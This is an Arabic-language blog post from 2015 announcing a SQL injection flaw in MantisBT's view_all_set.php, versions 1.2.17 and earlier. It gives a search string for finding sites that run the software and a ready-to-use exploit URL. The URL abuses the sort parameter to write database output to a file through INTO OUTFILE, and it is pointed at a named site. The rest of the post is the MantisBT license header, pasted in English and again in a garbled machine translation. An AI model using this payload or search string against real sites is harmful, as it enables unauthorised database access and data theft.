Thursday, 22 January 2015

ثغره مع التنزيل MantisBT view_all_set.php Multiple SQL Injection Vulnerabilities

المثال لبرمجه

التنزيل باخر اصدار من المصدر
mantisbt
البحث يكون كتالي
Powered by MantisBT 1.3.0devmaster-e704f56
Copyright © 2000 - 2014 MantisBT Team
Contact administrator for assistance

الثغره
MantisBT 1.2.17 and prior are vulnerable
MantisBT 'view_all_set.php' Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URI is available:
http://kuwait.com/view_all_set.php?sort=id,severity,status+DESC+INTO+OUTFILE+%27/tmp/sql_dump.txt%27+--&dir=ASC,ASC,ASC&type=2 
MantisBT is a popular free web-based bug tracking system. It is written in PHP works with MySQL, MS SQL, and PostgreSQL databases. MantisBT has been ...
MantisBT هو حر نظام تتبع علة على شبكة الإنترنت شعبية. هو مكتوب في PHP يعمل مع MySQL، MS SQL وقواعد البيانات كيو. وكان MantisBT ...
# MantisBT - a php based bugtracking system
# MantisBT is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# MantisBT is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with MantisBT. If not, see .
/**
* @package MantisBT
* @copyright Copyright (C) 2000 - 2002 Kenzaburo Ito - kenito@300baud.org
* @copyright Copyright (C) 2002 - 2014 MantisBT Team - mantisbt-dev@lists.sourceforge.net
* @link http://www.mantisbt.org
*/
# MantisBT - نظام bugtracking فب مقرها
# MantisBT هي البرمجيات الحرة: يمكنك إعادة توزيعه و / أو تعديله
# تحت شروط رخصة جنو العمومية والتي نشرتها
# مؤسسة البرمجيات الحرة، إما الإصدار 2 من الرخصة، أو
# (باختيارك) أي إصدار لاحق.
#
يتم توزيع # MantisBT على أمل أن يكون مفيدا،
# ولكن دون أي ضمان؛ حتى دون ضمان ضمني
# التسويق أو الملاءمة لغرض معين. رؤية
# رخصة جنو العمومية العامة لمزيد من التفاصيل.
#
# من المفترض أنك تلقيت نسخة من رخصة جنو العمومية العامة
# جنبا إلى جنب مع MantisBT. إن لم يكن، انظر .
/ **
*package MantisBT
*copyright حقوق النشر (C) 2000-2002 كينزابورو إيتو - kenito@300baud.org
*copyright حقوق النشر (C) 2002-2014 MantisBT فريق - mantisbt-dev@lists.sourceforge.net
*link http://www.mantisbt.org
*

No comments:

Post a Comment